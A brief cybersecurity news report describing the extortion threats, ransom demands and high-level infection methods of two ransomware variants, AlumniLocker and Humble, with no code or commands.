Researchers have discovered two new ransomware variants, named AlumniLocker and Humble. Both the ransomware have different sophisticated behaviors and extortion techniques, which may be considered as the two ends or edges of the extortion business.
- AlumniLocker operators threaten to leak stolen data if their victim does not pay the ransom within 48 hours. In the case of Humble, the operators threaten to rewrite Master Boot Record after a restart, which leaves the target machine unusable.
- Moreover, another variant of Humble has been observed, which makes the same threat of rewriting the Master Boot Record if the victim does not pay the ransom within a time period of five days.
- AlumniLocker asks for a ransom payment of 10 Bitcoins ( presently valued at $457,382.60), while Humble demands 0.0002 Bitcoins (around $10).
How do they operate?
- AlumniLocker spreads via a malicious PDF attachment as an invoice that is distributed in phishing emails. It is exactly not known how Humble infiltrates, however, phishing could be the possible vector.
- Phishing emails containing AlumniLocker have an attached Zip file that used PowerShell script to download and execute the payload. It exploits the Background Intelligent Service Transfer module.
- The Humble ransomware is unusual for being compiled with an executable wrapper (Bat2Exe) in a batch file. In addition, it uses Discord (a communications service) to send reports back to its authors.
Cybercriminals are developing new techniques to stay untraceable under popular anti-malware software. Continuous investment in such threats is a warning to the cybersecurity fraternity and demands a better defense and response strategy.